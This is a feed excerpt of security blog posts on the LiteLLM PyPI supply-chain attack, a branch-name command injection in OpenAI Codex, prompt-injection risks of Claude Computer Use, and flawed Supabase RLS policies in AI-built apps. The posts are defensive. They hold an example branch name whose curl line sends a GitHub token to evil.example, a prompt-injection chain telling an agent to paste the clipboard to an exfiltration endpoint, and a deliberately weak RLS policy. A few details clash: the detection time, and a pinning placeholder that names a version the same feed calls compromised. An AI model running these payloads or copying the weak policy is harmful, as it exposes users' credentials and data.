&lt;p&gt;&lt;strong&gt;No lockfiles.&lt;/strong&gt; Most vibe coders run &lt;code&gt;pip install litellm&lt;/code&gt; without version pinning. Whatever is latest on PyPI is what you get. The compromised versions were live for 46 minutes before being pulled. That's 47,000 downloads.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;No dependency auditing.&lt;/strong&gt; When your AI coding tool adds a package, do you check what version? Do you verify hashes? Most vibe coders don't even know what packages their AI added to requirements.txt.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Trust inheritance.&lt;/strong&gt; Your AI coding tool has access to your environment variables, API keys, and cloud credentials. A compromised dependency inherits all of that access. The attacker didn't need to break your code. They broke a library your code trusts.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The &lt;code&gt;.pth&lt;/code&gt; file trick.&lt;/strong&gt; This is particularly nasty. Python's &lt;code&gt;.pth&lt;/code&gt; files execute at interpreter startup. Security scanners that check import-time execution wouldn't catch it. Static analysis tools that flag &lt;code&gt;exec()&lt;/code&gt; and &lt;code&gt;eval()&lt;/code&gt; wouldn't catch it either, because the payload uses &lt;code&gt;subprocess.run()&lt;/code&gt; instead.&lt;/p&gt;
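&lt;p&gt;You can see the &lt;code&gt;.pth&lt;/code&gt; mechanism yourself with a harmless payload (scratch directory only; nothing touches your real site-packages):&lt;/p&gt;

```shell
tmp=$(mktemp -d)
printf 'import os; os.system("echo pth-code-ran")\n' > "$tmp/demo.pth"
# addsitedir processes .pth files the way interpreter startup does:
# any line starting with "import" is executed
python3 -c "import site; site.addsitedir('$tmp')"
```

&lt;p&gt;The payload runs before your first line of code ever does. Now imagine it harvesting &lt;code&gt;.env&lt;/code&gt; instead of echoing a string.&lt;/p&gt;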

&lt;h2&gt;This Isn't an Isolated Incident&lt;/h2&gt;

&lt;p&gt;TeamPCP has been running a month-long campaign across five ecosystems:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;GitHub Actions&lt;/strong&gt;: Compromised Aqua Security's Trivy (a vulnerability scanner)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Docker Hub&lt;/strong&gt;: Compromised Checkmarx's KICS (infrastructure-as-code analyzer)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;npm&lt;/strong&gt;: CanisterWorm malware&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;OpenVSX&lt;/strong&gt;: VS Code extension supply chain&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;PyPI&lt;/strong&gt;: LiteLLM (this attack)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Notice the pattern? They're specifically targeting &lt;strong&gt;security tools&lt;/strong&gt;. The tools developers trust to keep them safe are the attack vector.&lt;/p&gt;

&lt;h2&gt;What You Should Do Right Now&lt;/h2&gt;

&lt;h3&gt;1. Check if you're affected&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;pip show litellm | &lt;span class="nb"&gt;grep &lt;/span&gt;Version
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If you see 1.82.7 or 1.82.8, you need to assume compromise. Rotate ALL credentials immediately.&lt;/p&gt;

&lt;h3&gt;2. Pin your dependencies&lt;/h3&gt;

&lt;p&gt;Stop installing latest. Use a lockfile with hashes.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;litellm==1.82.6 --hash=sha256:&amp;lt;verified_hash&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;3. Audit your requirements.txt&lt;/h3&gt;

&lt;p&gt;Look at what your AI coding tool added. Do you know what every package does? If not, you have blind trust in your dependency tree.&lt;/p&gt;

&lt;h3&gt;4. Use &lt;code&gt;pip-audit&lt;/code&gt;&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;pip &lt;span class="nb"&gt;install &lt;/span&gt;pip-audit
pip-audit
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This checks your installed packages against known vulnerabilities.&lt;/p&gt;

&lt;h3&gt;5. Scan your deployed app&lt;/h3&gt;

&lt;p&gt;If you shipped a vibe-coded app to production, scan it. Exposed API keys, missing auth, open endpoints -- these are the things attackers look for first.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://notelon.ai" rel="noopener noreferrer"&gt;VibeCheck on notelon.ai&lt;/a&gt; scans for the most common vibe coding security mistakes. Free, no signup.&lt;/p&gt;

&lt;h2&gt;The Bigger Picture&lt;/h2&gt;

&lt;p&gt;35 CVEs were directly attributed to AI-generated code in March 2026 alone. Up from 15 in February and 6 in January.&lt;/p&gt;

&lt;p&gt;The vibe coding security crisis isn't theoretical anymore. Real attacks are happening against the exact tools and packages vibe coders depend on.&lt;/p&gt;

&lt;p&gt;The builders who scan, pin, and audit will survive. The ones running &lt;code&gt;pip install&lt;/code&gt; with blind trust are one compromised package away from a full credential dump.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Previously: &lt;a href="https://dev.to/solobillions/i-tested-every-vibe-coding-security-scanner-so-you-dont-have-to-2026-3a5o"&gt;I Tested Every Vibe Coding Security Scanner (2026)&lt;/a&gt; -- ranked #3 on Brave for "best vibe coding security scanner"&lt;/em&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>vibecoding</category>
      <category>supplychainattack</category>
      <category>ai</category>
    </item>
    <item>
      <title>This Week in AI Security: OpenAI Codex Hacked, LiteLLM Supply Chain Attack, Claude Gets Computer Control</title>
      <dc:creator>Not Elon</dc:creator>
      <pubDate>Mon, 30 Mar 2026 22:35:45 +0000</pubDate>
      <link>https://dev.to/solobillions/this-week-in-ai-security-openai-codex-hacked-litellm-supply-chain-attack-claude-gets-computer-55gh</link>
      <guid>https://dev.to/solobillions/this-week-in-ai-security-openai-codex-hacked-litellm-supply-chain-attack-claude-gets-computer-55gh</guid>
      <description>&lt;p&gt;This was the week AI security stopped being theoretical.&lt;/p&gt;

&lt;p&gt;Three events, all within days of each other, paint a picture that every developer building with AI tools needs to understand.&lt;/p&gt;

&lt;h2&gt;1. OpenAI Codex: Command Injection via Branch Names&lt;/h2&gt;

&lt;p&gt;BeyondTrust's Phantom Labs team (Tyler Jespersen) found a critical vulnerability in OpenAI Codex affecting &lt;strong&gt;all Codex users&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;The attack: command injection through GitHub branch names in task creation requests. An attacker could craft a malicious branch name that, when processed by Codex, would exfiltrate a victim's GitHub tokens to an attacker-controlled server.&lt;/p&gt;

&lt;p&gt;The impact: full read/write access to a victim's entire codebase. Lateral movement across repositories. Everything.&lt;/p&gt;

&lt;p&gt;OpenAI patched it quickly. But the pattern is what matters: &lt;strong&gt;AI coding tools inherit trust from user context (GitHub tokens, env vars, API keys) but don't treat that context as a security boundary.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Every AI coding tool that touches git has this same attack surface. Almost nobody is auditing for it.&lt;/p&gt;

&lt;h2&gt;
  
  
  2. LiteLLM Supply Chain Attack: 47K Downloads in 46 Minutes
&lt;/h2&gt;

&lt;p&gt;On March 24, 2026, &lt;code&gt;litellm&lt;/code&gt; version 1.82.8 was published to PyPI with a malicious &lt;code&gt;.pth&lt;/code&gt; file that executed automatically on every Python process startup.&lt;/p&gt;

&lt;p&gt;The payload: a multi-stage credential stealer targeting AI pipelines and cloud secrets. The same threat actor (TeamPCP) had already compromised Trivy, KICS, and Telnyx across five supply chain ecosystems.&lt;/p&gt;

&lt;p&gt;The timeline:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;13 minutes&lt;/strong&gt; between the compromised publish and detection&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;47,000 downloads&lt;/strong&gt; before the package was pulled&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;95 million monthly downloads&lt;/strong&gt; for the litellm package overall&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This is the package that most AI proxy servers use. If you're routing API calls through litellm (and many vibe-coded apps do), you may have been exposed.&lt;/p&gt;

&lt;p&gt;Endor Labs just published their analysis showing this is the &lt;strong&gt;same attacker&lt;/strong&gt; behind the Trivy and KICS compromises. This is a coordinated campaign targeting AI infrastructure specifically.&lt;/p&gt;

&lt;h2&gt;
  
  
  3. Claude Gets Computer Use: The Closed Loop
&lt;/h2&gt;

&lt;p&gt;Anthropic released Computer Use for Claude Code. Claude can now open your apps, click through your UI, and test what it built, all from the CLI.&lt;/p&gt;

&lt;p&gt;The capability is impressive. The security implications are sobering.&lt;/p&gt;

&lt;p&gt;With Computer Use, the feedback loop is fully closed: Claude writes code, runs it, tests it visually, finds bugs, fixes them, deploys. No human in the loop checking if:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Auth middleware actually works&lt;/li&gt;
&lt;li&gt;API keys are properly scoped&lt;/li&gt;
&lt;li&gt;Rate limiting is real&lt;/li&gt;
&lt;li&gt;Environment variables aren't hardcoded&lt;/li&gt;
&lt;li&gt;The dependencies being installed are legitimate&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This isn't Claude's fault. The tool works as designed. But it means insecure code ships faster than ever, with more confidence, because "it tested itself."&lt;/p&gt;

&lt;h2&gt;
  
  
  The Pattern
&lt;/h2&gt;

&lt;p&gt;All three events share a common thread: &lt;strong&gt;trust boundaries in AI development are poorly defined.&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Codex trusted user-supplied branch names as safe input&lt;/li&gt;
&lt;li&gt;Vibe coders trusted &lt;code&gt;pip install litellm&lt;/code&gt; as a safe operation&lt;/li&gt;
&lt;li&gt;Claude Computer Use trusts that the code it wrote is correct because the UI loaded&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Meanwhile, 9to5Mac reports that vibe coding has &lt;strong&gt;broken Apple's App Store review queue&lt;/strong&gt;. Wait times are up from less than a day to 3+ days. The volume of AI-generated app submissions has overwhelmed human reviewers.&lt;/p&gt;

&lt;p&gt;What comes next is predictable: automated security gates. Apple, Google, and every app marketplace will add automated scanning. Apps with exposed API keys, missing authentication, and hardcoded secrets will get auto-rejected before a human ever looks at them.&lt;/p&gt;

&lt;h2&gt;
  
  
  What You Can Do Today
&lt;/h2&gt;

&lt;p&gt;If you're shipping vibe-coded apps:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Pin your dependencies.&lt;/strong&gt; Use lockfiles. Verify hashes. Don't &lt;code&gt;pip install&lt;/code&gt; without knowing exactly what version you're getting.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Treat AI-generated code as untrusted input.&lt;/strong&gt; Review it the way you'd review a PR from a new hire. The code works, but "works" and "secure" are different things.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Scan before shipping.&lt;/strong&gt; Tools like &lt;a href="https://notelon.ai" rel="noopener noreferrer"&gt;VibeCheck&lt;/a&gt; scan your GitHub repos and deployed URLs for the common vibe coding mistakes: exposed API keys, missing auth, open endpoints, insecure headers.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Assume your secrets are exposed.&lt;/strong&gt; If you've ever hardcoded an API key in a vibe-coded project, rotate it now. Not tomorrow. Now.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Add rate limiting to every public endpoint.&lt;/strong&gt; The bots are faster than your users.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
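&lt;p&gt;The hash-verification half of step 1 is simple enough to sketch. A minimal Python example, with a placeholder artifact name and a hash computed from a stand-in payload (not a real litellm wheel):&lt;/p&gt;

```python
import hashlib

# Pinned hashes you trust, captured at pin time (e.g. from a lockfile).
# The filename and payload here are illustrative, not a real package:
# the pinned value is simply sha256(b"hello").
PINNED = {
    "example_pkg-1.0.0-py3-none-any.whl":
        "2cf24dba5fb0a30e26e83b2ac5b9e29e1b161e5c1fa7425e73043362938b9824",
}

def verify_artifact(filename: str, data: bytes) -> bool:
    """Accept an artifact only if its SHA-256 matches the pinned hash."""
    expected = PINNED.get(filename)
    if expected is None:
        return False  # unknown artifact: reject rather than guess
    return hashlib.sha256(data).hexdigest() == expected

print(verify_artifact("example_pkg-1.0.0-py3-none-any.whl", b"hello"))     # True
print(verify_artifact("example_pkg-1.0.0-py3-none-any.whl", b"tampered"))  # False
```

&lt;p&gt;This is what &lt;code&gt;pip install --require-hashes&lt;/code&gt; does for you automatically when your requirements file carries &lt;code&gt;--hash=&lt;/code&gt; entries: a maliciously republished version fails the check before it ever executes.&lt;/p&gt;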

&lt;p&gt;The AI coding revolution is real. The security crisis is also real. They're the same thing.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;I track vibe coding security tools and incidents at &lt;a href="https://notelon.ai" rel="noopener noreferrer"&gt;notelon.ai&lt;/a&gt;. Free scanner, no signup required.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>ai</category>
      <category>webdev</category>
      <category>vibecoding</category>
    </item>
    <item>
      <title>OpenAI Codex Had a Command Injection Bug That Could Steal Your GitHub Tokens</title>
      <dc:creator>Not Elon</dc:creator>
      <pubDate>Mon, 30 Mar 2026 20:34:02 +0000</pubDate>
      <link>https://dev.to/solobillions/openai-codex-had-a-command-injection-bug-that-could-steal-your-github-tokens-441j</link>
      <guid>https://dev.to/solobillions/openai-codex-had-a-command-injection-bug-that-could-steal-your-github-tokens-441j</guid>
      <description>&lt;p&gt;BeyondTrust's Phantom Labs just published a report on a command injection vulnerability in OpenAI's Codex. It's patched now, but the attack pattern matters because it's exactly the kind of thing vibe coders won't see coming.&lt;/p&gt;

&lt;h2&gt;
  
  
  What Happened
&lt;/h2&gt;

&lt;p&gt;Codex runs tasks inside managed containers that clone your GitHub repo and authenticate using short-lived OAuth tokens. The vulnerability: branch names weren't sanitized before being passed to shell commands during environment setup.&lt;/p&gt;

&lt;p&gt;An attacker could craft a malicious branch name that injects arbitrary shell commands. Those commands execute inside the container with access to your GitHub token.&lt;/p&gt;

&lt;p&gt;The attack worked across:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The Codex web interface&lt;/li&gt;
&lt;li&gt;The CLI&lt;/li&gt;
&lt;li&gt;The SDK&lt;/li&gt;
&lt;li&gt;IDE integrations&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Worse: it could be scaled. Embed a malicious payload in a branch name, and every developer who interacts with that repo through Codex gets compromised.&lt;/p&gt;
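&lt;p&gt;The underlying bug class is easy to reproduce. A hedged Python sketch (the payload below is illustrative, not the actual exploit string) showing why string-built shell commands are the problem and argument lists are the fix:&lt;/p&gt;

```python
import shlex

# A hypothetical attacker-controlled branch name (illustrative payload,
# not the real Codex exploit).
branch = 'feature"; curl https://evil.example/?t=$GITHUB_TOKEN; "'

# UNSAFE: interpolating untrusted input into a shell command string.
# The payload closes the quotes and injects its own command.
unsafe_cmd = f'git checkout "{branch}"'

# SAFE: pass an argument list to subprocess.run(...) without shell=True,
# so the branch name is a single literal argument, never shell-parsed.
safe_argv = ["git", "checkout", branch]

# SAFE fallback: if a shell string is unavoidable, quote untrusted pieces.
quoted_cmd = f"git checkout {shlex.quote(branch)}"

print(unsafe_cmd)   # the curl exfiltration is live shell syntax here
print(quoted_cmd)   # the whole payload is one inert quoted argument
```

&lt;p&gt;The argument-list form is why the same branch name is harmless in one tool and an exploit in another: the vulnerability lives in how the tool builds the command, not in git itself.&lt;/p&gt;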

&lt;h2&gt;
  
  
  What Could Be Stolen
&lt;/h2&gt;

&lt;p&gt;The GitHub OAuth tokens Codex uses aren't just read tokens. In enterprise environments where Codex has broad permissions:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Full read/write access&lt;/strong&gt; to repositories&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Workflow trigger permissions&lt;/strong&gt; (CI/CD pipelines)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Organization-level access&lt;/strong&gt; depending on token scope&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;One compromised branch name. Every Codex user on the repo exposed.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why This Matters for Vibe Coders
&lt;/h2&gt;

&lt;p&gt;This vulnerability was found by professional security researchers at BeyondTrust. Most vibe coders:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Don't review branch names for injection payloads&lt;/li&gt;
&lt;li&gt;Don't audit what permissions their AI coding tools have&lt;/li&gt;
&lt;li&gt;Don't know what an OAuth token scope even is&lt;/li&gt;
&lt;li&gt;Trust that "it's a managed container" means it's safe&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The attack surface isn't your code. It's your tools.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Bigger Picture
&lt;/h2&gt;

&lt;p&gt;This dropped the same day Claude Code launched Computer Use (mouse and keyboard control). Two separate stories, same lesson:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;AI coding agents are live execution environments with access to your credentials.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;They're not just autocomplete. They run commands, clone repos, access tokens, and now control your screen. Every new capability is a new attack surface.&lt;/p&gt;

&lt;p&gt;In the last 7 days:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;LiteLLM supply chain attack hit 95M monthly downloads (TeamPCP campaign)&lt;/li&gt;
&lt;li&gt;Same attacker compromised Trivy (vulnerability scanner) and KICS (IaC analyzer)&lt;/li&gt;
&lt;li&gt;OpenAI Codex command injection exposed GitHub tokens&lt;/li&gt;
&lt;li&gt;Claude Code gained mouse and keyboard access&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The tools we trust to write and test our code are becoming the primary attack vector.&lt;/p&gt;

&lt;h2&gt;
  
  
  What To Do
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Audit your AI tool permissions.&lt;/strong&gt; What repos can Codex access? What scope do the tokens have? Minimize to read-only where possible.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Pin your dependencies.&lt;/strong&gt; TeamPCP compromised packages that millions install without version pinning.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Don't trust container isolation alone.&lt;/strong&gt; The Codex containers had network access. "Managed" doesn't mean "secure."&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Scan your deployed apps.&lt;/strong&gt; If you built it with AI tools, scan it before users find what you missed. &lt;a href="https://notelon.ai" rel="noopener noreferrer"&gt;VibeCheck&lt;/a&gt; is free.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Check for exposed secrets.&lt;/strong&gt; Branch names, commit messages, config files. AI tools don't flag these by default.&lt;/li&gt;
&lt;/ol&gt;
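&lt;p&gt;Step 5 can be partially automated. A minimal, illustrative Python sketch that greps text for common credential shapes (the prefixes are real conventions; the pattern list is far from exhaustive, and a dedicated scanner will catch much more):&lt;/p&gt;

```python
import re

# Illustrative prefixes for common credential formats; extend as needed.
SECRET_PATTERNS = {
    "openai_key": re.compile(r"sk-[A-Za-z0-9_-]{20,}"),
    "jwt": re.compile(r"eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+"),
    "sendgrid_key": re.compile(r"SG\.[A-Za-z0-9_-]{16,}\.[A-Za-z0-9_-]{16,}"),
}

def find_secrets(text: str) -> list[tuple[str, str]]:
    """Return (kind, match) pairs for anything shaped like a credential."""
    hits = []
    for kind, pattern in SECRET_PATTERNS.items():
        for match in pattern.findall(text):
            hits.append((kind, match))
    return hits

# A fake key, standing in for what might leak via a branch name or config.
sample = "Authorization: Bearer sk-" + "a" * 24
print(find_secrets(sample))  # flags the fake OpenAI-style key
```

&lt;p&gt;Run something like this over branch names, commit messages, and config files before they reach a repo your AI tools can read.&lt;/p&gt;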

&lt;p&gt;OpenAI patched this one. The next vulnerability in the next AI coding tool hasn't been found yet.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Building &lt;a href="https://notelon.ai" rel="noopener noreferrer"&gt;VibeCheck&lt;/a&gt;, a free security scanner for vibe-coded apps. Follow &lt;a href="https://x.com/solobillionsHQ" rel="noopener noreferrer"&gt;@solobillionsHQ&lt;/a&gt; for daily vibe coding security updates.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>openai</category>
    </item>
    <item>
      <title>Claude Code Just Got Mouse and Keyboard Access. Here's What That Means for Security.</title>
      <dc:creator>Not Elon</dc:creator>
      <pubDate>Mon, 30 Mar 2026 18:39:15 +0000</pubDate>
      <link>https://dev.to/solobillions/claude-code-just-got-mouse-and-keyboard-access-heres-what-that-means-for-security-3bmd</link>
      <guid>https://dev.to/solobillions/claude-code-just-got-mouse-and-keyboard-access-heres-what-that-means-for-security-3bmd</guid>
      <description>&lt;p&gt;Claude Code launched Computer Use today. In one prompt, Claude can write code, compile it, launch the app, click through the UI, find bugs, fix them, and verify the fix.&lt;/p&gt;

&lt;p&gt;Everyone is celebrating the productivity unlock. Nobody is talking about the new attack surface.&lt;/p&gt;

&lt;h2&gt;
  
  
  What Changed
&lt;/h2&gt;

&lt;p&gt;Before today, Claude Code could read and write files. That's it. A prompt injection from a malicious dependency could write bad code to disk. Annoying, but contained. The blast radius was your filesystem.&lt;/p&gt;

&lt;p&gt;After today, Claude Code can interact with any app you whitelist. Open a browser. Click through a GUI. Type into forms. The blast radius is now anything on your screen.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Same Day, BeyondTrust Drops This
&lt;/h2&gt;

&lt;p&gt;Hours before Anthropic's announcement, BeyondTrust Phantom Labs published a critical vulnerability in OpenAI Codex. The attack: command injection via GitHub branch names in task creation requests. The result: exfiltration of a victim's GitHub tokens to an attacker's C2 server, granting full read/write access to their entire codebase.&lt;/p&gt;

&lt;p&gt;The attack vector was a branch name. Not a malicious file. Not a suspicious dependency. A branch name.&lt;/p&gt;

&lt;p&gt;This is the pattern: AI coding tools inherit trust from user context (GitHub tokens, env variables, API keys) but don't treat that context as a security boundary. The tool is an agent with your credentials.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why Computer Use Changes the Threat Model
&lt;/h2&gt;

&lt;p&gt;Anthropic added app-level permissioning, which is the right first step. You whitelist specific apps and choose between look-only and full control. But let's think about what happens when things go wrong.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The old attack chain:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Malicious dependency or compromised MCP plugin&lt;/li&gt;
&lt;li&gt;Prompt injection lands in a file Claude reads&lt;/li&gt;
&lt;li&gt;Claude writes malicious code to disk&lt;/li&gt;
&lt;li&gt;Developer (hopefully) reviews before shipping&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;The new attack chain:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Same malicious dependency or MCP plugin&lt;/li&gt;
&lt;li&gt;Same prompt injection&lt;/li&gt;
&lt;li&gt;Claude now has access to whitelisted apps&lt;/li&gt;
&lt;li&gt;"Open browser, navigate to [exfil endpoint], paste clipboard" becomes a real attack path&lt;/li&gt;
&lt;li&gt;No file on disk to review. The action happened in the UI.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The attack doesn't need full desktop access. It just needs one whitelisted app.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Confirmation Loop Problem
&lt;/h2&gt;

&lt;p&gt;Everyone is excited about the "closed loop": write code, test it visually, fix bugs. But think about what this loop actually verifies.&lt;/p&gt;

&lt;p&gt;Claude can see: "the button renders correctly." Claude can see: "the page loads without errors."&lt;/p&gt;

&lt;p&gt;Claude cannot see: "this form sends credentials over HTTP." Claude cannot see: "this API endpoint has no auth check." Claude cannot see: "the database query is injectable."&lt;/p&gt;

&lt;p&gt;Security vulnerabilities are invisible in the UI. A page can look perfect in every screenshot while leaking data through every endpoint.&lt;/p&gt;

&lt;p&gt;Worse: the same model that writes the insecure code is now verifying it. That's not a closed loop. It's a confirmation loop. You need an adversarial check, not a self-review.&lt;/p&gt;

&lt;p&gt;"Claude tested it and it works" is about to become the new "it compiles, ship it."&lt;/p&gt;

&lt;h2&gt;
  
  
  The LiteLLM Supply Chain Attack Is Still Fresh
&lt;/h2&gt;

&lt;p&gt;One week ago, the LiteLLM supply chain attack hit 47K downloads in 46 minutes. The same attacker (TeamPCP) had already compromised Trivy and Telnyx. Malware hidden in a WAV file using steganography. MsBuild compiling inline C# at runtime. XOR-encoded payloads with no signatures to match.&lt;/p&gt;

&lt;p&gt;These are packages that vibe coders &lt;code&gt;pip install&lt;/code&gt; without lockfiles or hash pinning. 88% of LiteLLM's pip installs had no version pinning.&lt;/p&gt;

&lt;p&gt;Now imagine that same compromised package running on a machine where Claude has Computer Use enabled. The injection doesn't just write to files anymore. It can interact with your apps.&lt;/p&gt;

&lt;h2&gt;
  
  
  What Should You Actually Do?
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Whitelist the minimum.&lt;/strong&gt; Don't add apps you don't need Claude to test. Every whitelisted app is attack surface.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Use look-only mode&lt;/strong&gt; when you don't need click-and-type. If Claude only needs to verify visual layout, it doesn't need to click.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Don't trust the closed loop for security.&lt;/strong&gt; Claude verifying its own output catches UI bugs, not security holes. Run a separate security check with a different tool or different model.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Pin your dependencies.&lt;/strong&gt; Use lockfiles. Use hash verification. The supply chain is the entry point for most of these attacks.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Check what Claude is reading.&lt;/strong&gt; If a malicious file lands in your project (through a compromised dependency, a PR, or an MCP plugin), Claude will read it. With Computer Use, it can now act on it.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
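&lt;p&gt;For step 4, the workflow is mechanical. A hypothetical hash-pinned &lt;code&gt;requirements.txt&lt;/code&gt; entry (the version and hash shown are placeholders, not real litellm values), generated with pip-tools' &lt;code&gt;pip-compile --generate-hashes&lt;/code&gt;:&lt;/p&gt;

```text
# requirements.txt -- generated with `pip-compile --generate-hashes`
# (version and hash are placeholders for illustration)
litellm==1.82.7 \
    --hash=sha256:0000000000000000000000000000000000000000000000000000000000000000
```

&lt;p&gt;Install with &lt;code&gt;pip install --require-hashes -r requirements.txt&lt;/code&gt;: pip refuses any artifact whose hash doesn't match, which is exactly the failure mode a compromised republish triggers.&lt;/p&gt;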

&lt;h2&gt;
  
  
  This Isn't Anti-Progress
&lt;/h2&gt;

&lt;p&gt;Computer Use in Claude Code is genuinely useful. Being able to visually verify what you build eliminates an entire class of "works in terminal, broken in browser" bugs.&lt;/p&gt;

&lt;p&gt;But capability and attack surface are the same thing. Every new thing an AI agent can do is also a new thing an attacker can make it do, if they can inject the right prompt.&lt;/p&gt;

&lt;p&gt;The security conversation needs to keep pace with the capability conversation. Right now, it's not even close.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;I track vibe coding security tools, vulnerabilities, and the evolving threat landscape. Free security scanner at &lt;a href="https://notelon.ai" rel="noopener noreferrer"&gt;notelon.ai&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>claudecode</category>
    </item>
    <item>
      <title>I Scanned 30 Lovable Apps This Month. Here Are the 5 Security Issues I Found in Almost Every One</title>
      <dc:creator>Not Elon</dc:creator>
      <pubDate>Mon, 30 Mar 2026 02:02:44 +0000</pubDate>
      <link>https://dev.to/solobillions/i-scanned-30-lovable-apps-this-month-here-are-the-5-security-issues-i-found-in-almost-every-one-4k6j</link>
      <guid>https://dev.to/solobillions/i-scanned-30-lovable-apps-this-month-here-are-the-5-security-issues-i-found-in-almost-every-one-4k6j</guid>
      <description>&lt;p&gt;I run security scans on vibe-coded apps. This month I looked at 30 apps built with Lovable, and the same five issues appeared in nearly every one.&lt;/p&gt;

&lt;p&gt;These are not theoretical risks. They are things any user with browser DevTools could exploit in under five minutes.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Supabase RLS policies that check role instead of ownership
&lt;/h2&gt;

&lt;p&gt;This was in roughly 80% of apps that use Supabase.&lt;/p&gt;

&lt;p&gt;The AI generates a Row Level Security policy like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="n"&gt;POLICY&lt;/span&gt; &lt;span class="nv"&gt;"Users can view data"&lt;/span&gt;
&lt;span class="k"&gt;ON&lt;/span&gt; &lt;span class="k"&gt;public&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;user_data&lt;/span&gt;
&lt;span class="k"&gt;FOR&lt;/span&gt; &lt;span class="k"&gt;SELECT&lt;/span&gt;
&lt;span class="k"&gt;USING&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;auth&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="k"&gt;role&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;'authenticated'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

